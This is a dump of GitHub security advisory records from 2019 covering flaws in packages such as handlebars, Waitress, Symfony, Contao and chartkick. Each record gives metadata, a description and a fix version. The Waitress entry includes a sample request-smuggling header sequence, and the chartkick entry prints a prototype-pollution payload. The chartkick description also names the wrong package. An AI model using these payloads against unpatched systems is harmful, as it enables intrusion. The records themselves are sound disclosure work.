[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12308'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/1.11.21/'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/2.1.9/'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/2.2.2/'}, {'type': 'WEB', 'url': 'https://docs.djangoproject.com/en/dev/releases/security/'}, {'type': 'PACKAGE', 'url': 'https://github.com/django/django'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/django-announce/GEbHU7YoVz8'}, {'type': 'WEB', 'url': 'https://www.djangoproject.com/weblog/2019/jun/03/security-releases/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2019/06/03/2'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-10T18:41:42Z', 'nvd_published_at': '2019-06-03T17:29:00Z'}
1.4.0
GHSA-83rx-c8cr-6j8q
2021-08-04T21:33:58Z
2019-06-05T20:48:55Z
null
[]
Insecure Default Configuration in tesseract.js
Versions of `tesseract.js` prior to 1.0.19 default to using a third-party proxy. Requests may be proxied through `crossorigin.me` which clearly states is not suitable for production use. This may lead to instability and privacy violations. ## Recommendation Upgrade to version 1.0.19 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'tesseract.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.19'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/naptha/tesseract.js/pull/267'}, {'type': 'WEB', 'url': 'https://github.com/naptha/tesseract.js/commit/679eba055f2a4271558e86beec3d1b70cae3fb28'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TESSERACTJS-174085'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/792'}]
{'cwe_ids': ['CWE-829'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T20:48:43Z', 'nvd_published_at': None}
1.4.0
GHSA-w457-6q6x-cgp9
2022-06-06T17:16:15Z
2019-12-26T17:58:13Z
null
['CVE-2019-19919']
Prototype Pollution in handlebars
Versions of `handlebars` prior to 3.0.8 or 4.3.0 are vulnerable to Prototype Pollution leading to Remote Code Execution. Templates may alter an Objects' `__proto__` and `__defineGetter__` properties, which may allow an attacker to execute arbitrary code through crafted payloads. ## Recommendation Upgrade to version 3.0.8, 4.3.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'handlebars'}, 'ecosystem_specific': {'affected_functions': ['handlebars.compile']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19919'}, {'type': 'WEB', 'url': 'https://github.com/wycats/handlebars.js/issues/1558'}, {'type': 'WEB', 'url': 'https://github.com/wycats/handlebars.js/commit/2078c727c627f25d4a149962f05c1e069beb18bc'}, {'type': 'WEB', 'url': 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19919'}, {'type': 'PACKAGE', 'url': 'https://github.com/wycats/handlebars.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1164'}, {'type': 'WEB', 'url': 'https://www.tenable.com/security/tns-2021-14'}]
{'cwe_ids': ['CWE-1321', 'CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-12-26T17:55:40Z', 'nvd_published_at': '2019-12-20T23:15:00Z'}
1.4.0
GHSA-24r8-fm9r-cpj2
2021-01-08T20:10:19Z
2019-12-05T18:40:51Z
null
['CVE-2019-16771']
Low severity vulnerability that affects com.linecorp.armeria:armeria
## Multiple timing attack vulnerabilities leading to the recovery of secrets based on the use of non-constant time compare function ### Impact String comparison method in multiple authentication validation in Armeria were known to be vulnerable to timing attacks. This vulnerability is caused by the insecure implementation of `equals` method from `java.lang.String`. While this attack is not practically possible, an attacker still has a potential to attack if the victim's server validates user by using `equals` method. We would like to thank @chrsow for pointing out the issue. ## Potentially vulnerable codes https://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/OAuth2Token.java#L54 https://github.com/line/armeria/blob/f0d870fde1088114070be31b67f7df0a21e835c6/core/src/main/java/com/linecorp/armeria/server/auth/BasicToken.java#L64 ### Patches There are two options to patch this issue. 1. Remove `equals` method; it has been exclusively used for test cases and was never used in any OSS projects that are using Armeria. (But it is worth noting that there are possibilities of closed projects authenticating users by utilizing `equals` method) 2. Use `MessageDigest.isEqual` to compare the credential instead. ### Workarounds 1. Update to the latest version (TBD) 2-1. Users can prevent these vulnerabilities by modifying and implementing timing attack preventions by themselves. 2-2. Precisely speaking, it is possible to compare credentials by securely comparing them after calling methods to directly return the input (namely `Object. accessToken()`, `Object.username()` and `Object.password()`). ### References - https://cwe.mitre.org/data/definitions/208.html - https://security.stackexchange.com/questions/111040/should-i-worry-about-remote-timing-attacks-on-string-comparison ### Side Note Since it is a theoretical attack, there is no PoC available from neither the vendor nor the security team.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'com.linecorp.armeria:armeria'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.97.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/line/armeria/security/advisories/GHSA-24r8-fm9r-cpj2'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/security/advisories/GHSA-35fr-h7jr-hh86'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16771'}, {'type': 'WEB', 'url': 'https://github.com/line/armeria/commit/b597f7a865a527a84ee3d6937075cfbb4470ed20'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-24r8-fm9r-cpj2'}]
{'cwe_ids': ['CWE-113'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T20:51:26Z', 'nvd_published_at': None}
1.4.0
GHSA-wjx8-cgrm-hh8p
2023-04-25T16:32:33Z
2019-12-17T22:53:10Z
null
['CVE-2019-19745']
Unrestricted file uploads in Contao
### Impact A back end user with access to the form generator can upload arbitrary files and execute them on the server. ### Patches Update to Contao 4.4.46 or 4.8.6. ### Workarounds Configure your web server so it does not execute PHP files and other scripts in the Contao file upload directory. ### References https://contao.org/en/security-advisories/unrestricted-file-uploads ### For more information If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.46'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.8.6'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-wjx8-cgrm-hh8p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-19745'}, {'type': 'WEB', 'url': 'https://contao.org/en/news.html'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/unrestricted-file-uploads.html'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2019-19745.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]
{'cwe_ids': ['CWE-434'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-12-17T19:42:31Z', 'nvd_published_at': None}
1.4.0
GHSA-3fjq-93xj-3f3f
2021-01-08T20:02:20Z
2019-12-06T23:20:26Z
null
['CVE-2019-16772']
Cross-Site Scripting in serialize-to-js
Versions of `serialize-to-js` prior to 3.0.1 are vulnerable to Cross-Site Scripting (XSS). The package fails to sanitize serialized regular expressions. This vulnerability does not affect Node.js applications. ## Recommendation Upgrade to version 3.0.1 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'serialize-to-js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/commenthol/serialize-to-js/security/advisories/GHSA-3fjq-93xj-3f3f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16772'}, {'type': 'WEB', 'url': 'https://github.com/commenthol/serialize-to-js/commit/181d7d583ae5293cd47cc99b14ad13352875f3e3'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3fjq-93xj-3f3f'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1429'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T20:55:02Z', 'nvd_published_at': None}
1.4.0
GHSA-pg36-wpm5-g57p
2022-04-25T23:10:28Z
2019-12-20T23:03:57Z
null
['CVE-2019-16785']
HTTP Request Smuggling: LF vs CRLF handling in Waitress
### Impact Waitress implemented a &amp;quot;MAY&amp;quot; part of the RFC7230 (https://tools.ietf.org/html/rfc7230#section-3.5) which states: Although the line terminator for the start-line and header fields is the sequence CRLF, a recipient MAY recognize a single LF as a line terminator and ignore any preceding CR. Unfortunately if a front-end server does not parse header fields with an LF the same way as it does those with a CRLF it can lead to the front-end and the back-end server parsing the same HTTP message in two different ways. This can lead to a potential for HTTP request smuggling/splitting whereby Waitress may see two requests while the front-end server only sees a single HTTP message. Example: ``` Content-Length: 100[CRLF] X-Header: x[LF]Content-Length: 0[CRLF] ``` Would get treated by Waitress as if it were: ``` Content-Length: 100 X-Header: x Content-Length: 0 ``` This could potentially get used by attackers to split the HTTP request and smuggle a second request in the body of the first. ### Patches This issue is fixed in Waitress 1.4.0. This brings a range of changes to harden Waitress against potential HTTP request confusions, and may change the behaviour of Waitress behind non-conformist proxies. Waitress no longer implements the MAY part of the specification and instead requires that all lines are terminated correctly with CRLF. If any lines are found with a bare CR or LF a 400 Bad Request is sent back to the requesting entity. The Pylons Project recommends upgrading as soon as possible, while validating that the changes in Waitress don&amp;#39;t cause any changes in behavior. ### Workarounds Various reverse proxies may have protections against sending potentially bad HTTP requests to the backend, and or hardening against potential issues like this. If the reverse proxy doesn&amp;#39;t use HTTP/1.1 for connecting to the backend issues are also somewhat mitigated, as HTTP pipelining does not exist in HTTP/1.0 and Waitress will close the connection after every single request (unless the Keep Alive header is explicitly sent... so this is not a fool proof security method) ### Issues/more security issues: * open an issue at https://github.com/Pylons/waitress/issues (if not sensitive or security related) * email the Pylons Security mailing list: pylons-project-security@googlegroups.com (if security related)
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'waitress'}, 'ecosystem_specific': {'affected_functions': ['waitress.parser.HTTPRequestParser.parse_header', 'waitress.parser.get_header_lines', 'waitress.receiver.ChunkedReceiver', 'waitress.receiver.ChunkedReceiver.received']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/security/advisories/GHSA-pg36-wpm5-g57p'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16785'}, {'type': 'WEB', 'url': 'https://github.com/Pylons/waitress/commit/8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0720'}, {'type': 'WEB', 'url': 'https://docs.pylonsproject.org/projects/waitress/en/latest/#security-fixes'}, {'type': 'PACKAGE', 'url': 'https://github.com/Pylons/waitress'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/05/msg00011.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GVDHR2DNKCNQ7YQXISJ45NT4IQDX3LJ7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LYEOTGWJZVKPRXX2HBNVIYWCX73QYPM5/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]
{'cwe_ids': ['CWE-444'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-12-20T23:01:44Z', 'nvd_published_at': '2019-12-20T23:15:00Z'}
1.4.0
GHSA-xhh6-956q-4q69
2021-07-28T16:28:00Z
2019-12-02T18:08:19Z
null
['CVE-2019-18888']
Argument injection in a MimeTypeGuesser in Symfony
An issue was discovered in Symfony 2.8.0 through 2.8.50, 3.4.0 through 3.4.34, 4.2.0 through 4.2.11, and 4.3.0 through 4.3.7. If an application passes unvalidated user input as the file for which MIME type validation should occur, then arbitrary arguments are passed to the underlying file command. This is related to symfony/http-foundation (and symfony/mime in 4.3.x).
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.8.52'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-foundation'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/mime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.8'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.8.52'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.4.35'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.2.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.3.0'}, {'fixed': '4.3.8'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-18888'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2019-18888.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/mime/CVE-2019-18888.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-18888.yaml'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/releases/tag/v4.3.8'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZNXRVHDQBNZQUCNRVZICPPBFRAUWUJX/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VXEAOEANNIVYANTMOJ42NKSU6BGNBULZ/'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/cve-2019-18888-prevent-argument-injection-in-a-mimetypeguesser'}, {'type': 'WEB', 'url': 'https://symfony.com/blog/symfony-4-3-8-released'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2019-18888'}]
{'cwe_ids': ['CWE-20', 'CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-12-01T19:46:13Z', 'nvd_published_at': '2019-11-21T23:15:00Z'}
1.4.0
GHSA-3r8j-pmch-5j2h
2021-01-08T21:20:32Z
2019-12-05T19:57:04Z
null
['CVE-2019-16768']
Internal exception message exposure for login action in Sylius
## Internal exception message exposure for login action ### Impact Exception messages from internal exceptions (like database exception) are wrapped by `\Symfony\Component\Security\Core\Exception\AuthenticationServiceException` and propagated through the system to UI. Therefore, some internal system information may leak and be visible to the customer. A validation message with the exception details will be presented to the user when one will try to log into the shop. ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds The `src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig` file should be overridden and lines https://github.com/Sylius/Sylius/blob/1.4/src/Sylius/Bundle/UiBundle/Resources/views/Security/_login.html.twig#L13-L17 should be replaced with ```twig {% if last_error %} <div class="ui left aligned basic segment"> {{ messages.error(last_error.messageKey) }} </div> {% endif %} ``` The `messageKey` field should be used instead of the `message`.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.10'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'sylius/sylius'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.6.0'}, {'fixed': '1.6.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/security/advisories/GHSA-3r8j-pmch-5j2h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-16768'}, {'type': 'WEB', 'url': 'https://github.com/Sylius/Sylius/commit/be245302dfc594d8690fe50dd47631d186aa945f'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3r8j-pmch-5j2h'}]
{'cwe_ids': ['CWE-209'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-06-16T20:56:06Z', 'nvd_published_at': None}
1.4.0
GHSA-5pm8-492c-92p5
2023-01-26T20:23:44Z
2019-12-02T18:04:11Z
null
['CVE-2019-18841']
Prototype Pollution in chartkick
Affected versions of `@polymer/polymer` are vulnerable to prototype pollution. The package fails to prevent modification of object prototypes through chart options containing a payload such as `{"__proto__": {"polluted": true}}`. It is possible to achieve the same results if a chart loads data from a malicious server. ## Recommendation Upgrade to version 3.2.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'chartkick'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'chartkick'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1.0'}, {'fixed': '3.2.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.1.3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-18841'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick.js/issues/117'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick/commit/b810936bbf687bc74c5b6dba72d2397a399885fa'}, {'type': 'WEB', 'url': 'https://chartkick.com'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick/blob/master/CHANGELOG.md'}, {'type': 'WEB', 'url': 'https://github.com/ankane/chartkick/commits/master'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/chartkick/CVE-2019-18841.yml'}, {'type': 'WEB', 'url': 'https://rubygems.org/gems/chartkick/'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-11-27T02:43:23Z', 'nvd_published_at': '2019-11-11T01:15:00Z'}
1.4.0
GHSA-3c45-wgjp-7v9r
2023-08-31T09:50:49Z
2019-12-17T22:52:34Z
null
['CVE-2014-7143']
Python Twisted trustRoot is not respected in HTTP client
Python Twisted 14.0.0 `trustRoot` is not respected in HTTP client
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'twisted'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0.0'}, {'fixed': '14.0.1'}]}], 'versions': ['14.0.0']}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-7143'}, {'type': 'WEB', 'url': 'https://github.com/twisted/twisted/commit/3b5942252f5f3e45862a0e12b266ab29e243cc33'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-7143'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/96135'}, {'type': 'PACKAGE', 'url': 'https://github.com/twisted/twisted'}, {'type': 'WEB', 'url': 'https://security-tracker.debian.org/tracker/CVE-2014-7143'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2014/09/22/2'}]
{'cwe_ids': ['CWE-295'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-12-17T01:47:21Z', 'nvd_published_at': None}